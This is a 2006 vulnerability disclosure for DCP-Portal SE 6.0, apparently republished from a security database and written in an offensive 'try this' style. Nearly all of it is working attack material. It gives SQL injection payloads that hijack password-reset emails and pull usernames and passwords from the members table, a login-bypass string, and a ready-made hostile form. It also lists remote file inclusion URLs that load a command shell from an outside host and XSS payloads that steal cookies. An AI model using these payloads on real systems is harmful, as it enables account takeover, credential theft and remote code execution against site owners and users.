DCP-Portal SE 6.0 multiple injections

2006-09-14T00:00:00
ID SECURITYVULNS:DOC:14279
Type securityvulns
Reporter Securityvulns
Modified 2006-09-14T00:00:00

Description

Hello,,

DCP-Portal SE 6.0 multiple injections

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net

sql injections if magic_qoutes_gpc = off /*******/

lostpassword.php

you can recive the reset password email on your email for any user you want :) change youremail@yourserver.com to your real email example : -1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members/*

and you will recive email reset password for all the members in this website

and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid

-1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members where uid=1/*


login try the user name as ' or uid=1/*

or change the uid value for any username you want log with

file calendar.php Sql injection by post method ,, try this form :)

<form name="hack" action="calendar.php" method=post> <input type=hidden name='year' value="-1' union select uid,username,password,null,null from dcp5_members where uid='1"> <input type=submit> </form>


file search.php

try one of these ,, bcause the number of columns changes from section to another :) if you searched for (content,news,link,forum) use xx%') union select uid,username,password from dcp5_members/*

if you searched for (doc,anns) use xx%') union select uid,username,password,password from dcp5_members/ /******/

Remote File including library/lib.php?root=http://www.soqor.net/tools/cmd.txt? library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?

/*******/

Fill path library/editor/editor.php library/lib.php

/*******/

Xss admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</script><" admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</script>

admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</script><" admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</script> admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</script> admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</script>

/*******/ WwW.SoQoR.NeT